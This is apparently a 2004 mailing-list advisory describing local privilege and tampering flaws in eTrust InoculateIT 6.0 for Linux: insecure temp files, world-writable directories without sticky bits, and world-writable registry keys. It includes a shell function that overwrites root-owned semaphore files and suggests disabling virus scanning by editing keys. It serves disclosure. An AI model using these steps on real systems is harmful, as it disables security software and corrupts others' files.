Date: 9 Feb 2004 17:09:55 -0000
From: Rene <[email protected]>
To: [email protected]Subject: [local problems] eTrust Virus Protection 6.0 InoculateIT for linux
author: l0om <[email protected]>
software: eTrust Virus Protection 6.0 InoculateIT for
linux
local phun with etrust antivirus 6.0 inoculateIT
linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eTrust InnoculateIT 6.0 comes for the following OSes:
-windows 95/98/ME
-windows nt 4.0/2000
-novell netware 3.x 4.x 5.x
-lotus notes/domino
-mircosoft exchange server
-and finally linux (SuSE, RedHat, Caldera, Turbo
Linux)
eTrust is a antivirus program which can scan nearly
every fileformat
for viruses. i have installed the version for linux
on my SuSE 9.0 system
and noticed the following security flaws:
1) possible symlink attacks in some scripts
by the way- the env variable $CAIGLBL0000 can be /
usr/local/eTrust/ for example.
however - the $CAIGLGL0000/tmp IS world writable...
ino/scripts/inoregupdate
########################
[...]
tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$
$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn
[...]
scripts/uniftest
################
local=$CAIGLBL0000/tmp
local1=$CAIGLBL0000/scripts
[...]
$CAIGLBL0000/bin/unips > $local/unips.$$
awk -f $local1/uniftest.awk $local/unips.$$
st_rc=$?
rm $local/unips.$$
[...]
scripts/unimove
###############
sed -e "s!$from!$to!g" $fn > /
tmp/.unimove.sed #<-- creats it now
diff $fn /tmp/.unimove.sed > /dev/null
if [ $? != 0 -a -s /tmp/.unimove.sed ];
then
mv /tmp/.unimove.sed $fn
rm /tmp/.unimove.sed # dels it if
finished
2) some directorys in /tmp dont have the sticky bit
set
an example:
eTrustAE.lnx/tmp/.caipcs/ # ls -l
drwxrwxrwx 8 root root 240 2004-02-05
09:58 .
drwxrwxrwx 4 root root 160 2004-02-09
16:53 ..
drwxrwxrwx 2 root root 48 2004-02-05
09:54 .file
-rw-r--r-- 1 root root 4110 2004-02-05
09:58 ipcrm.log
drwxrwxrwx 2 root root 856 2004-02-05
10:48 .nob_event
drwxrwxrwx 2 root root 1168 2004-02-05
10:48 .nob_mutex
drwxrwxrwx 2 root root 48 2004-02-05
09:54 .nob_sem
drwxrwxrwx 2 root root 384 2004-02-05
10:48 .sem
drwxrwxrwx 2 root root 80 2004-02-05
10:48 .shm
eTrustAE.lnx/tmp/.caipcs # ls -l .sem
drwxrwxrwx 2 root root 384 2004-02-05
10:48 .
drwxrwxrwx 8 root root 240 2004-02-05
09:58 ..
-rw------- 1 root root 20 2004-02-05
10:01 3571729
-rw------- 1 root root 5 2004-02-05
09:58 3702805
-rw------- 1 root root 25 2004-02-05
10:01 3735574
-rw------- 1 root root 25 2004-02-05
10:01 3768343
-rw------- 1 root root 15 2004-02-05
09:58 3801112
this directory includes values which are kinda
sensetive. so only root can
read or write them as we can see at this
filepermissions.
but as the upper directory /.sem has no sticky bit
set and is world writeable.
we can simple overwrite these files as the directory
permissions are of a
higher priority as the file permissions. this is the
truth for a handful of
directorys.
for example:
badass~:> phun()
{
for i in `ls /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem`; do
cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem/$i
done
echo jupp
}
badass~:> phun
jupp
badass~:>
3) world writeable
with the linux version of etrust there come some
directroys which we all know- the
"registry". it seems like the whole registry key is
world writeable:
>find ./ -type f -perm -2 -print
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
macro_cure_action
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
scan_files
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
log_infected_files
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/home
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/logs
[...]
they got the sticky bit set, therefore we cannot
overwrite or delte them, but sometimes we can
change sensetive values in the registry. for example:
cat ./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list
|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|
386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|
POT|
PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|
PIF|BAT|
this key contains a list of fileends which specifies
what files should be scaned for a virus.
a normal user can simply delte all values except one
from this list, and can make the scanner pretty
lame...
furthermore there are worldwritable keys like
"windows/currentversion", with keys which include the
path to
the normal binarys ("/usr/bin"). it may be possible
to execute whatever you want on a reboot if you
change
the right keys in the right way.
have phun!
feel phree!
life phat!
YaCP - (Y)ast (a)nother (C)yber(P)unk
--l0om
--www.excluded.org
